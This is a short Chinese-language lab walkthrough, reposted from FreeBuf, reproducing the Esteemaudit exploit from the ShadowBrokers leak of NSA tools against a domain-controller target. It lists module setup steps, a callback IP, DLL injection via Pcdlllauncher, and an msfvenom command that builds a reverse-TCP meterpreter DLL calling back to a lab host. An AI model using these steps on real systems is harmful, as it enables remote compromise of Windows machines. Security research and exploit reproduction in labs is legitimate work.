ShadowBroker釋放的NSA工具中Esteemaudit漏洞復現過程

近日臭名昭著的方程式組織工具包再次被公開，TheShadowBrokers在steemit.com博客上提供了相關消息。以下是其中Esteemaudit漏洞復現過程。

前期準備

靶機環境

需要域控環境

Esteemaudit漏洞復現過程

use Esteemaudit使用漏洞模塊

設置目標IP和埠

然後基本上默認，基本配置如下：

運行後再進行配置。

然後基本上選擇相對應的設置，CallbackIp填自己的，埠隨便

然後配置DLL。注意這裡默認路徑基本上是不對，找到自己對應的文件路徑進行修改：

然後基本上配置如下

可以運行了

利用Pcdlllauncher注入DLL

使用Pcdlllauncher

use Pcdlllauncher

然後生成用於反彈shell的dll payload：

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.146.129 LPORT=4444 -f dll >win.dll

然後進行配置

找到自己對應的文件路徑修改

要注入的惡意DLL文件路徑

然後基本上默認，運行就行了，成功注入

查看Metasploit，成功返回shell

*本文作者：zusheng，轉載請註明來自FreeBuf.COM

喜歡這篇文章嗎？立刻分享出去讓更多人知道吧！